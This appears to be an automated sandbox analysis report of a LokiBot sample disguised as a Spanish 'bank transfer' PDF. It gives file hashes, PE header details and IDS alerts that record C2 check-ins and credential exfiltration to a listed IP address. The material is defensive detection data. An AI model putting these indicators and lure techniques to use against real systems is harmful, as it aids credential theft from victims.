SHA-256:	123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
SHA-512:	1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
Malicious:	true
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

C:\Users\user\AppData\Roaming\C79A3B\B52B3F.lck

Download File

Process:	C:\Users\user\Desktop\transferencia bancaria.pdf.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Reputation:	high, very likely benign file
Preview:	1

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3853321935-2125563209-4053062332-1002\21c8026919fd094ab07ec3c180a9f210_d06ed635-68f6-4e9a-955c-4899f5f57b9a

Download File

Process:	C:\Users\user\Desktop\transferencia bancaria.pdf.exe
File Type:	data
Category:	dropped
Size (bytes):	49
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	884BB48A55DA67B4812805CB8905277D
SHA1:	6B3D33E00F5B9DEAE2826F80644CB4F6E78B7401
SHA-256:	78877FA898F0B4C45C9C33AE941E40617AD7C8657A307DB62BC5691F92F4F60E
SHA-512:	989A38778FC961EB2C79E70621EABFB4B22D6537F08A71359B27AF495646E304EE252A523769F66B75BC2FAF546ACB22A71B358B51221174AC0D964DA7A62821
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	.................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	6.908301217464369
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	transferencia bancaria.pdf.exe
File size:	811008
MD5:	355efb2e1f7dd361f8e7cda449a45eac
SHA1:	864f8d367c72d37347e2dc8fa799cc9a2550d66c
SHA256:	cb90ea9b90ccb675d555891bcbfb224edf1bbfe7a650e9600508c93660ec09eb
SHA512:	696a0d695e86094c35abf41001c607fa3df61bbf5cb7bf11feadd4bd434a67ce31628106c71688e8782f4e326e71aaced83b031764c4214832df455329edc8c5
SSDEEP:	12288:dR/AN9w7DTIJ0ycSou3KRdwHDI3tRG/8wSRDfs2sFLTAehm8buS89W:3XXEyycSDAwHNi8TAqbD
TLSH:	8005E00F8AE6460ED66936B865F0EFB75799DC01F44BC35B17CA6E4BB8432308211BD9
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....\|#...............0..X...........v... ........@.. ....................................@................................

File Icon


Icon Hash:	00828e8e8686b000

Static PE Info

General

Entrypoint:	0x4c761e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0xA9237CA5 [Wed Dec 3 11:06:13 2059 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xc75cc	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc8000	0x370	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xca000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0xc75b0	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xc5624	0xc5800	False	0.712665644778481	data	6.915983824184794	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xc8000	0x370	0x400	False	0.365234375	data	2.7841237517285475	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xca000	0xc	0x200	False	0.044921875	data	0.09800417566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_VERSION	0xc8058	0x314	data

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
192.168.2.691.142.77.4549712802024318 11/03/22-12:30:22.162497	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49712	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549727802024313 11/03/22-12:31:01.987085	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49727	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549723802825766 11/03/22-12:30:53.367985	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49723	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549724802021641 11/03/22-12:30:54.913991	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49724	80	192.168.2.6	91.142.77.45
192.168.2.68.8.8.859881532014169 11/03/22-12:31:01.170102	UDP	2014169	ET DNS Query for .su TLD (Soviet Union) Often Malware Related	59881	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.856122532014169 11/03/22-12:30:45.704907	UDP	2014169	ET DNS Query for .su TLD (Soviet Union) Often Malware Related	56122	53	192.168.2.6	8.8.8.8
192.168.2.691.142.77.4549741802825766 11/03/22-12:31:39.946873	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49741	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549745802024313 11/03/22-12:31:50.569101	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49745	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549728802025381 11/03/22-12:31:03.903902	TCP	2025381	ET TROJAN LokiBot Checkin	49728	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549739802021641 11/03/22-12:31:35.606377	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49739	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549738802825766 11/03/22-12:31:33.019427	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49738	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549713802025381 11/03/22-12:30:25.414440	TCP	2025381	ET TROJAN LokiBot Checkin	49713	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549731802025381 11/03/22-12:31:09.511791	TCP	2025381	ET TROJAN LokiBot Checkin	49731	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549737802024318 11/03/22-12:31:31.046497	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49737	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549713802825766 11/03/22-12:30:25.414440	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49713	80	192.168.2.6	91.142.77.45
91.142.77.45192.168.2.680497182025483 11/03/22-12:30:41.067853	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49718	91.142.77.45	192.168.2.6
91.142.77.45192.168.2.680497092025483 11/03/22-12:30:17.656419	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49709	91.142.77.45	192.168.2.6
192.168.2.68.8.8.850343532014169 11/03/22-12:31:05.602892	UDP	2014169	ET DNS Query for .su TLD (Soviet Union) Often Malware Related	50343	53	192.168.2.6	8.8.8.8
192.168.2.691.142.77.4549717802024318 11/03/22-12:30:35.019960	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49717	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549717802024313 11/03/22-12:30:35.019960	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49717	80	192.168.2.6	91.142.77.45
192.168.2.68.8.8.856569532014169 11/03/22-12:31:22.519121	UDP	2014169	ET DNS Query for .su TLD (Soviet Union) Often Malware Related	56569	53	192.168.2.6	8.8.8.8
91.142.77.45192.168.2.680497122025483 11/03/22-12:30:23.556931	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49712	91.142.77.45	192.168.2.6
192.168.2.691.142.77.4549729802021641 11/03/22-12:31:05.707382	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49729	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549742802021641 11/03/22-12:31:41.893270	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49742	80	192.168.2.6	91.142.77.45
192.168.2.68.8.8.853943532014169 11/03/22-12:30:54.819244	UDP	2014169	ET DNS Query for .su TLD (Soviet Union) Often Malware Related	53943	53	192.168.2.6	8.8.8.8
192.168.2.691.142.77.4549730802024318 11/03/22-12:31:07.626823	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49730	80	192.168.2.6	91.142.77.45
91.142.77.45192.168.2.680497102025483 11/03/22-12:30:19.791139	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49710	91.142.77.45	192.168.2.6
192.168.2.691.142.77.4549735802024313 11/03/22-12:31:27.516452	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49735	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549721802025381 11/03/22-12:30:48.032802	TCP	2025381	ET TROJAN LokiBot Checkin	49721	80	192.168.2.6	91.142.77.45
192.168.2.68.8.8.855629532014169 11/03/22-12:31:09.419344	UDP	2014169	ET DNS Query for .su TLD (Soviet Union) Often Malware Related	55629	53	192.168.2.6	8.8.8.8
192.168.2.691.142.77.4549731802825766 11/03/22-12:31:09.511791	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49731	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549738802025381 11/03/22-12:31:33.019427	TCP	2025381	ET TROJAN LokiBot Checkin	49738	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549712802024313 11/03/22-12:30:22.162497	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49712	80	192.168.2.6	91.142.77.45
91.142.77.45192.168.2.680497142025483 11/03/22-12:30:29.899760	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49714	91.142.77.45	192.168.2.6
91.142.77.45192.168.2.680497162025483 11/03/22-12:30:34.572782	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49716	91.142.77.45	192.168.2.6
192.168.2.691.142.77.4549706802021641 11/03/22-12:30:09.785093	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49706	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549730802024313 11/03/22-12:31:07.626823	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49730	80	192.168.2.6	91.142.77.45
192.168.2.68.8.8.861609532014169 11/03/22-12:30:50.734926	UDP	2014169	ET DNS Query for .su TLD (Soviet Union) Often Malware Related	61609	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.862958532014169 11/03/22-12:31:41.802948	UDP	2014169	ET DNS Query for .su TLD (Soviet Union) Often Malware Related	62958	53	192.168.2.6	8.8.8.8
192.168.2.691.142.77.4549735802024318 11/03/22-12:31:27.516452	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49735	80	192.168.2.6	91.142.77.45
192.168.2.68.8.8.849232532014169 11/03/22-12:31:30.955921	UDP	2014169	ET DNS Query for .su TLD (Soviet Union) Often Malware Related	49232	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.862848532014169 11/03/22-12:31:45.492508	UDP	2014169	ET DNS Query for .su TLD (Soviet Union) Often Malware Related	62848	53	192.168.2.6	8.8.8.8
192.168.2.691.142.77.4549733802025381 11/03/22-12:31:22.614964	TCP	2025381	ET TROJAN LokiBot Checkin	49733	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549732802021641 11/03/22-12:31:20.467945	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49732	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549720802024318 11/03/22-12:30:45.793165	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49720	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549718802025381 11/03/22-12:30:37.003049	TCP	2025381	ET TROJAN LokiBot Checkin	49718	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549721802825766 11/03/22-12:30:48.032802	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49721	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549720802024313 11/03/22-12:30:45.793165	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49720	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549714802024318 11/03/22-12:30:27.432237	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49714	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549719802024318 11/03/22-12:30:42.564459	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49719	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549725802024313 11/03/22-12:30:57.918358	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49725	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549715802825766 11/03/22-12:30:31.132672	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49715	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549719802024313 11/03/22-12:30:42.564459	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49719	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549710802825766 11/03/22-12:30:18.297577	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49710	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549734802021641 11/03/22-12:31:25.377976	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49734	80	192.168.2.6	91.142.77.45
192.168.2.68.8.8.862910532014169 11/03/22-12:30:27.345778	UDP	2014169	ET DNS Query for .su TLD (Soviet Union) Often Malware Related	62910	53	192.168.2.6	8.8.8.8
91.142.77.45192.168.2.680497352025483 11/03/22-12:31:28.883670	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49735	91.142.77.45	192.168.2.6
192.168.2.691.142.77.4549737802021641 11/03/22-12:31:31.046497	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49737	80	192.168.2.6	91.142.77.45
91.142.77.45192.168.2.680497422025483 11/03/22-12:31:43.475626	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49742	91.142.77.45	192.168.2.6
192.168.2.691.142.77.4549714802024313 11/03/22-12:30:27.432237	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49714	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549711802025381 11/03/22-12:30:20.264286	TCP	2025381	ET TROJAN LokiBot Checkin	49711	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549722802024313 11/03/22-12:30:50.822444	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49722	80	192.168.2.6	91.142.77.45
192.168.2.68.8.8.856331532014169 11/03/22-12:30:13.938466	UDP	2014169	ET DNS Query for .su TLD (Soviet Union) Often Malware Related	56331	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.849448532014169 11/03/22-12:30:17.960732	UDP	2014169	ET DNS Query for .su TLD (Soviet Union) Often Malware Related	49448	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.850506532014169 11/03/22-12:30:15.990659	UDP	2014169	ET DNS Query for .su TLD (Soviet Union) Often Malware Related	50506	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.859752532014169 11/03/22-12:31:35.521025	UDP	2014169	ET DNS Query for .su TLD (Soviet Union) Often Malware Related	59752	53	192.168.2.6	8.8.8.8
192.168.2.691.142.77.4549722802024318 11/03/22-12:30:50.822444	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49722	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549726802021641 11/03/22-12:30:59.657451	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49726	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549741802025381 11/03/22-12:31:39.946873	TCP	2025381	ET TROJAN LokiBot Checkin	49741	80	192.168.2.6	91.142.77.45
91.142.77.45192.168.2.680497392025483 11/03/22-12:31:37.318947	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49739	91.142.77.45	192.168.2.6
192.168.2.691.142.77.4549709802021641 11/03/22-12:30:16.075566	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49709	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549727802024318 11/03/22-12:31:01.987085	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49727	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549728802825766 11/03/22-12:31:03.903902	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49728	80	192.168.2.6	91.142.77.45
91.142.77.45192.168.2.680497312025483 11/03/22-12:31:10.691873	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49731	91.142.77.45	192.168.2.6
192.168.2.68.8.8.865198532014169 11/03/22-12:30:25.312645	UDP	2014169	ET DNS Query for .su TLD (Soviet Union) Often Malware Related	65198	53	192.168.2.6	8.8.8.8
192.168.2.691.142.77.4549721802021641 11/03/22-12:30:48.032802	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49721	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549715802024318 11/03/22-12:30:31.132672	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49715	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549726802825766 11/03/22-12:30:59.657451	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49726	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549724802024313 11/03/22-12:30:54.913991	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49724	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549710802025381 11/03/22-12:30:18.297577	TCP	2025381	ET TROJAN LokiBot Checkin	49710	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549712802021641 11/03/22-12:30:22.162497	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49712	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549735802825766 11/03/22-12:31:27.516452	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49735	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549744802825766 11/03/22-12:31:45.577786	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49744	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549740802021641 11/03/22-12:31:37.627027	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49740	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549743802024318 11/03/22-12:31:43.782645	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49743	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549743802024313 11/03/22-12:31:43.782645	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49743	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549707802025381 11/03/22-12:30:11.977904	TCP	2025381	ET TROJAN LokiBot Checkin	49707	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549726802025381 11/03/22-12:30:59.657451	TCP	2025381	ET TROJAN LokiBot Checkin	49726	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549725802024318 11/03/22-12:30:57.918358	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49725	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549707802825766 11/03/22-12:30:11.977904	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49707	80	192.168.2.6	91.142.77.45
91.142.77.45192.168.2.680497342025483 11/03/22-12:31:27.178865	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49734	91.142.77.45	192.168.2.6
192.168.2.691.142.77.4549731802021641 11/03/22-12:31:09.511791	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49731	80	192.168.2.6	91.142.77.45
192.168.2.68.8.8.852481532014169 11/03/22-12:30:53.275834	UDP	2014169	ET DNS Query for .su TLD (Soviet Union) Often Malware Related	52481	53	192.168.2.6	8.8.8.8
192.168.2.691.142.77.4549720802025381 11/03/22-12:30:45.793165	TCP	2025381	ET TROJAN LokiBot Checkin	49720	80	192.168.2.6	91.142.77.45
192.168.2.68.8.8.864404532014169 11/03/22-12:31:43.694917	UDP	2014169	ET DNS Query for .su TLD (Soviet Union) Often Malware Related	64404	53	192.168.2.6	8.8.8.8
192.168.2.691.142.77.4549708802025381 11/03/22-12:30:14.035064	TCP	2025381	ET TROJAN LokiBot Checkin	49708	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549735802021641 11/03/22-12:31:27.516452	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49735	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549706802024317 11/03/22-12:30:09.785093	TCP	2024317	ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2	49706	80	192.168.2.6	91.142.77.45
91.142.77.45192.168.2.680497322025483 11/03/22-12:31:21.820409	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49732	91.142.77.45	192.168.2.6
192.168.2.68.8.8.852865532014169 11/03/22-12:31:37.538077	UDP	2014169	ET DNS Query for .su TLD (Soviet Union) Often Malware Related	52865	53	192.168.2.6	8.8.8.8
192.168.2.691.142.77.4549725802825766 11/03/22-12:30:57.918358	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49725	80	192.168.2.6	91.142.77.45
91.142.77.45192.168.2.680497292025483 11/03/22-12:31:07.339016	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49729	91.142.77.45	192.168.2.6
192.168.2.691.142.77.4549724802024318 11/03/22-12:30:54.913991	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49724	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549706802024312 11/03/22-12:30:09.785093	TCP	2024312	ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1	49706	80	192.168.2.6	91.142.77.45
91.142.77.45192.168.2.680497212025483 11/03/22-12:30:50.362964	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49721	91.142.77.45	192.168.2.6
91.142.77.45192.168.2.680497232025483 11/03/22-12:30:54.557575	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49723	91.142.77.45	192.168.2.6
192.168.2.691.142.77.4549739802025381 11/03/22-12:31:35.606377	TCP	2025381	ET TROJAN LokiBot Checkin	49739	80	192.168.2.6	91.142.77.45
192.168.2.68.8.8.863863532014169 11/03/22-12:30:30.240421	UDP	2014169	ET DNS Query for .su TLD (Soviet Union) Often Malware Related	63863	53	192.168.2.6	8.8.8.8
192.168.2.691.142.77.4549744802021641 11/03/22-12:31:45.577786	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49744	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549745802025381 11/03/22-12:31:50.569101	TCP	2025381	ET TROJAN LokiBot Checkin	49745	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549736802025381 11/03/22-12:31:29.221112	TCP	2025381	ET TROJAN LokiBot Checkin	49736	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549741802021641 11/03/22-12:31:39.946873	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49741	80	192.168.2.6	91.142.77.45
192.168.2.691.142.77.4549742802025381 11/03/22-12:31:41.893270	TCP	2025381	ET TROJAN LokiBot Checkin	49742	80	192.168.2.6	91.142.77.45
192.168.2.68.8.8.862538532014169 11/03/22-12:30:34.919732	UDP	2014169	ET DNS Query for .su TLD (Soviet Union) Often Malware Related	62538	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.858595532014169 11/03/22-12:30:11.893252	UDP	2014169	ET DNS Query for .su TLD (Soviet Union) Often Malware Related	58595	53	192.168.2.6	8.8.8.8
